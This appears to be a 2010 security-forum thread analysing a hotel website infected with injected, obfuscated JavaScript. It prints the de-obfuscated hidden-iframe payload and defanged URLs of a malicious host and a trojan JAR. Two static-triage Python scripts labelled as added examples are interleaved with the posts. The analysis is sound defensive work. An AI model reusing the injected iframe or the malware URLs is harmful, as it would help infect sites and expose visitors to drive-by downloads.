Author Topic: Legal Website was infected by JS:ScriptDC-inf (Trj)  (Read 10420 times)


Yanto.Chiang
Legal Website was infected by JS:ScriptDC-inf (Trj)
« on: February 04, 2010, 11:17:01 AM »
Dear All,

Just would like to share this legal website, which is infected by a script that automatically pushes the user to download a malicious package.

http://safeweb.norton.com/report/show?url=http%3A%2F%2Fwww.tradershotel.net%2Ftraders-hotel-singapore%2F&x=0&y=0

http://www.unmaskparasites.com/security-report/?page=www.duowan.com/0910/119283364074.html

The link is : xxx.tradershotel.net/traders-hotel-singapore/

Note: please don't try it at home if you are not protected yet, because it contains:

Drive-by Downloads
    A drive-by download is computer code that takes advantage of a software bug in a Web browser to make it do something that the attacker wants—such as run malicious code, crash the browser, or read data from the computer. Software bugs that are open to browser attacks are also known as vulnerabilities.

Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya

Pondus
Re: Legal Website was infected by JS:ScriptDC-inf (Trj)
« Reply #1 on: February 04, 2010, 11:54:45 AM »
Do you have the download from that website? Can you upload it to VirusTotal?

Yanto.Chiang
Re: Legal Website was infected by JS:ScriptDC-inf (Trj)
« Reply #2 on: February 05, 2010, 03:32:15 AM »
Hi Pondus,

I am not able to download it, since I am protected by avast IS 5.0 (trial license).

And is it possible for us to download it?

Since this website is infected and silently asks the user to download the malicious package.

Yanto.Chiang
Re: Legal Website was infected by JS:ScriptDC-inf (Trj)
« Reply #3 on: February 05, 2010, 04:14:21 AM »

jsejtko (Avast team)
Re: Legal Website was infected by JS:ScriptDC-inf (Trj)
« Reply #4 on: February 05, 2010, 09:18:05 AM »
Hello,

The problem is in server-generated messages (404 in this case); please look at the attached image. There are injected scripts (several copies of an identical one). A hidden iframe tag is located under the encryption; it points to a known malicious website.

You will have to remove all the scripts (shown in the image) and check the security of your server (passwords, vulnerabilities, etc.).

Regards

Yanto.Chiang
Re: Legal Website was infected by JS:ScriptDC-inf (Trj)
« Reply #5 on: February 05, 2010, 09:46:09 AM »
Quote from: jsejtko on February 05, 2010, 09:18:05 AM
Hello,

The problem is in server-generated messages (404 in this case); please look at the attached image. There are injected scripts (several copies of an identical one). A hidden iframe tag is located under the encryption; it points to a known malicious website.

You will have to remove all the scripts (shown in the image) and check the security of your server (passwords, vulnerabilities, etc.).

Regards

Hi,

Thanks for your detailed information; I just would like to know what the source of this problem is.


YoKenny (Guest)
Re: Legal Website was infected by JS:ScriptDC-inf (Trj)
« Reply #6 on: February 05, 2010, 10:51:36 AM »
Have a read here:
Every 3.6 seconds a website is infected
http://www.scmagazineus.com/every-36-seconds-a-website-is-infected/article/140414

The site owner of tradershotel.net will have to clean up their site and follow jsejtko's advice.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

computerfreaker (Guest)
Re: Legal Website was infected by JS:ScriptDC-inf (Trj)
« Reply #8 on: February 06, 2010, 10:27:54 PM »
I just went to check out that page; here's what Microsoft Forefront Client Security had to say, almost immediately.
Quote
Virus: JS/Decdec.A. Risk level: Severe. Advice: Remove this program immediately.
Programs that may compromise your privacy or damage your computer were detected.

I let it run in a sandbox, then grabbed the malicious JS and de-obfuscated it. Here's the results:
Code:
<iframe src="hxxp://www.kotopes.cn/forum/image/index.php" width=1 height=1 frameborder=0></iframe>
<iframe src="hxxp://www.kotopes.cn/forum/image/index.php" width=1 height=1 frameborder=0></iframe>
<iframe src="hxxp://www.kotopes.cn/forum/image/index.php" width=1 height=1 frameborder=0></iframe>
<iframe src="hxxp://www.kotopes.cn/forum/image/index.php" width=1 height=1 frameborder=0></iframe>

hxxp://www.kotopes.cn/forum/image/index.php returned a 404 Not Found, but hxxp://www.kotopes.cn is still alive and well. It's possible, too, that the 404 Not Found is an evasive maneuver.
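What jsejtko describes (several identical script copies injected into a server-generated 404 page, with the hidden iframe sitting under an encoding layer) and what computerfreaker recovered by de-obfuscating (1x1 iframes) can be checked without loading the page in a browser. The following is an added example, not code from this thread or from Avast: a Python triage script that pulls inline script blocks out of a saved copy of a page, statically peels unescape()/String.fromCharCode() layers without executing any JavaScript, and reports iframes that are 1x1 or styled invisible, plus how many byte-identical script copies the page carries. The 404 page it runs on is constructed, and bad.example is a placeholder host, not the one named in the thread.

```python
"""Static triage of a page suspected of carrying injected, obfuscated scripts.

Added example, not code from the thread. The page below is constructed to
resemble the pattern described: several identical <script> blocks in a server
error page that decode to 1x1 or display:none iframes. bad.example is a
placeholder host, not the one named in the thread. No JavaScript is executed;
unescape()/String.fromCharCode() layers are peeled with regular expressions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
UNESCAPE_RE = re.compile(r'''unescape\(\s*(['"])(.*?)\1\s*\)''', re.S)
FROMCHAR_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)", re.S)


def js_unescape(s: str) -> str:
    """JavaScript unescape(): %XX like URL decoding plus the %uXXXX form."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def decode_layers(script: str, max_rounds: int = 10) -> str:
    """Replace decodable unescape()/fromCharCode() calls with their literal result.

    Rounds repeat because one layer often produces another; the cap stops
    pathological input from looping forever.
    """
    for _ in range(max_rounds):
        new = UNESCAPE_RE.sub(lambda m: js_unescape(m.group(2)), script)
        new = FROMCHAR_RE.sub(
            lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()),
            new,
        )
        if new == script:
            break
        script = new
    return script


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a fragment."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def iframes_in(fragment: str) -> list:
    collector = IframeCollector()
    collector.feed(fragment)
    collector.close()
    return collector.iframes


def is_hidden(attrs: dict) -> bool:
    """1x1 (or smaller) frames and display:none / visibility:hidden styles."""
    def tiny(value):
        try:
            return int(str(value).strip().rstrip("px")) <= 1
        except ValueError:
            return False
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (tiny(attrs.get("width")) and tiny(attrs.get("height"))) \
        or "display:none" in style or "visibility:hidden" in style


def scan_page(html: str) -> dict:
    """Report hidden iframe targets found in the page or inside its decoded scripts."""
    scripts = SCRIPT_RE.findall(html)
    found = iframes_in(html)                      # iframes written in the clear
    for body in scripts:
        found += iframes_in(decode_layers(body))  # iframes hidden behind encoding
    hidden = sorted({a.get("src", "") for a in found if is_hidden(a)})
    # Repeated byte-identical script blocks are the injection signature seen here.
    copies = max((scripts.count(s) for s in scripts), default=0)
    return {"hidden_iframes": hidden, "script_blocks": len(scripts),
            "max_identical_copies": copies}


# Constructed sample: a 404 page carrying three injected script variants.
INJECTED = ("<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2F"
            "bad.example%2Fforum%2Fimage%2Findex.php%22%20width%3D1%20height%3D1"
            "%20frameborder%3D0%3E%3C%2Fiframe%3E'))</script>")
SAMPLE_404 = (
    "<html><head><title>404 Not Found</title>" + INJECTED + "</head><body>"
    "<h1>Not Found</h1><p>The requested URL was not found on this server.</p>"
    '<iframe src="https://maps.example/embed" width="300" height="200"></iframe>'
    + INJECTED +
    '<script>document.write(unescape("%u003Ciframe%20src%3D%22http%3A%2F%2Fbad.example'
    '%2Fforum%2Fimage%2Findex.php%22%20style%3D%22display%3Anone%22%3E%3C%2Fiframe%3E"))'
    "</script>"
    "<script>var t=String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,"
    "116,116,112,58,47,47,98,97,100,46,101,120,97,109,112,108,101,47,105,110,46,112,104,"
    "112,34,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,62,60,47,105,"
    "102,114,97,109,101,62);document.write(t);</script></body></html>"
)

if __name__ == "__main__":
    print(scan_page(SAMPLE_404))
```

Run it against a saved copy of the error page (for instance the body returned for a non-existent path, since the injection in this thread lives in the 404 handler). It only understands the two encodings shown; a script that needs real JavaScript execution to reveal its payload belongs in a sandboxed browser or a JS emulator instead.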

polonus
Re: Legal Website was infected by JS:ScriptDC-inf (Trj)
« Reply #9 on: February 06, 2010, 10:39:56 PM »
Hi computerfreaker,

Good work, here are the identical results from another scan:
General information
Location of website is in China

Analyzed kotopes dot cn for security problems.

Report of threats found
Total number of threats: 1

    Virus
Threat found: 1
Full list:
Name of threat:   Trojan Horse
Location:    htxp://www.kotopes.cn/forum/image/spl/sd.jar

pol

computerfreaker (Guest)
Re: Legal Website was infected by JS:ScriptDC-inf (Trj)
« Reply #10 on: February 08, 2010, 04:50:13 AM »
Quote from: polonus on February 06, 2010, 10:39:56 PM
Hi computerfreaker,

Good work, here are the identical results from another scan:
General information
Location of website is in China

Analyzed kotopes dot cn for security problems.

Report of threats found
Total number of threats: 1

    Virus
Threat found: 1
Full list:
Name of threat:   Trojan Horse
Location:    htxp://www.kotopes.cn/forum/image/spl/sd.jar

pol

You couldn't be more right on that JAR. I just loaded it; for some reason (maybe NoScript interfered with it?), it loaded as text. One thing caught my eye immediately: "payload". I'm going to download that and analyze it in a sandbox.

EDIT: wow, was that fast. I saved the JAR file, renamed it to a zip, and started extracting it; Microsoft Forefront Client Security immediately yelled about "Exploit:Java/CVE-2008-5353-B. Alert level: severe", "Trojan:Java/Selace.B" and "Trojan:Java/Selace.A".

WOW, is this blatant: the JAR contains three files, AppletX.class, LoaderX.class, and PayloadX.class. PayloadX.class triggered "Trojan:Java/Selace.B", AppletX.class triggered "Exploit:Java/CVE-2008-5353-B", and LoaderX.class triggered "Trojan:Java/Selace.A".

Let's see about decompiling these three bad boys and see what comes out.
Hmm, Mocha doesn't like these for some reason. It's telling me they "aren't valid class files"; anybody know why, or what else I could use to decompile these?
Just from looking at them in a text editor, it looks like AppletX.class contains an overflow attack of some kind; right after a reference to Java's String object, I found this, followed by a StringToBytes call:
Quote
[unprintable bytes from AppletX.class, omitted]
I would like more info, though (especially on PayloadX.class and LoaderX.class), and decompiling is the way to go here IMHO.

Cheers!

computerfreaker
« Last Edit: February 08, 2010, 04:54:15 AM by computerfreaker »
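Before reaching for a decompiler, a practitioner usually inventories the JAR as a zip and checks each .class entry's header: the first four bytes must be the magic 0xCAFEBABE, and the next two u2 fields are the minor and major class-file version; a decompiler from the Java 1.x era may refuse classes compiled for a much newer JDK. The block below is an added example, not computerfreaker's code or anything from the thread: it builds a constructed JAR in memory with stub entries named after the three classes mentioned above (no real bytecode, and one header deliberately mangled), then reports per entry the header verdict, the declared Java version and any plain strings such as "payload" or Runtime/exec.

```python
"""Static triage of a suspicious JAR: inventory and header checks, nothing executed.

Added example, not the original poster's code. The JAR is constructed in
memory: its entries are stub headers with a few filler bytes (no real
bytecode), and the names AppletX/LoaderX/PayloadX are taken from the thread
only as labels.
"""
import io
import struct
import zipfile

CLASS_MAGIC = 0xCAFEBABE
# Major version numbers the JDK writes into class files (45 = Java 1.1 ... 50 = Java 6).
JAVA_VERSION = {45: "1.1", 46: "1.2", 47: "1.3", 48: "1.4", 49: "5", 50: "6"}
# Plain strings worth a second look in a small applet: process execution, temp paths, "payload".
SUSPICIOUS_STRINGS = (b"payload", b"Runtime", b"getRuntime", b"exec", b"/tmp", b"\\Temp")


def class_header(data: bytes) -> dict:
    """Parse the 8-byte class-file header: u4 magic, u2 minor_version, u2 major_version."""
    if len(data) < 8:
        return {"valid": False, "reason": "shorter than a class-file header"}
    magic, minor, major = struct.unpack(">IHH", data[:8])
    if magic != CLASS_MAGIC:
        return {"valid": False, "reason": "bad magic 0x%08X" % magic}
    return {"valid": True, "major": major, "minor": minor,
            "java": JAVA_VERSION.get(major, "unknown (%d)" % major)}


def triage_jar(jar_bytes: bytes) -> dict:
    """Per-entry report: size, keyword hits, and for .class entries the header verdict."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info.filename)
            entry = {"size": len(data),
                     "hits": sorted(s.decode() for s in SUSPICIOUS_STRINGS if s in data)}
            if info.filename.endswith(".class"):
                entry.update(class_header(data))
            report[info.filename] = entry
    return report


def make_class_stub(major: int, body: bytes = b"") -> bytes:
    """Constructed stand-in for a class file: correct header followed by filler bytes."""
    return struct.pack(">IHH", CLASS_MAGIC, 0, major) + body


def build_sample_jar() -> bytes:
    """Constructed three-class JAR; PayloadX deliberately lacks the class magic."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("AppletX.class", make_class_stub(50, b"java/applet/Applet"))
        zf.writestr("LoaderX.class", make_class_stub(50, b"java/lang/Runtime getRuntime exec"))
        zf.writestr("PayloadX.class", b"\x00\x00\x00\x00" + b"payload.exe /tmp")
    return buf.getvalue()


if __name__ == "__main__":
    for name, entry in triage_jar(build_sample_jar()).items():
        print(name, entry)
```

Point triage_jar() at the bytes of the real file (open(path, "rb").read()); zipfile does not care about the .jar extension, so no renaming is needed. A bad-magic entry is either not a class file at all (data stored under a .class name) or has a damaged header, and either would explain a decompiler rejecting it; the string hits are only a prompt for where to look once decompilation does work.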

Yanto.Chiang
Re: Legal Website was infected by JS:ScriptDC-inf (Trj)
« Reply #11 on: February 08, 2010, 05:27:32 AM »
Nice information from you guys...

Cheers,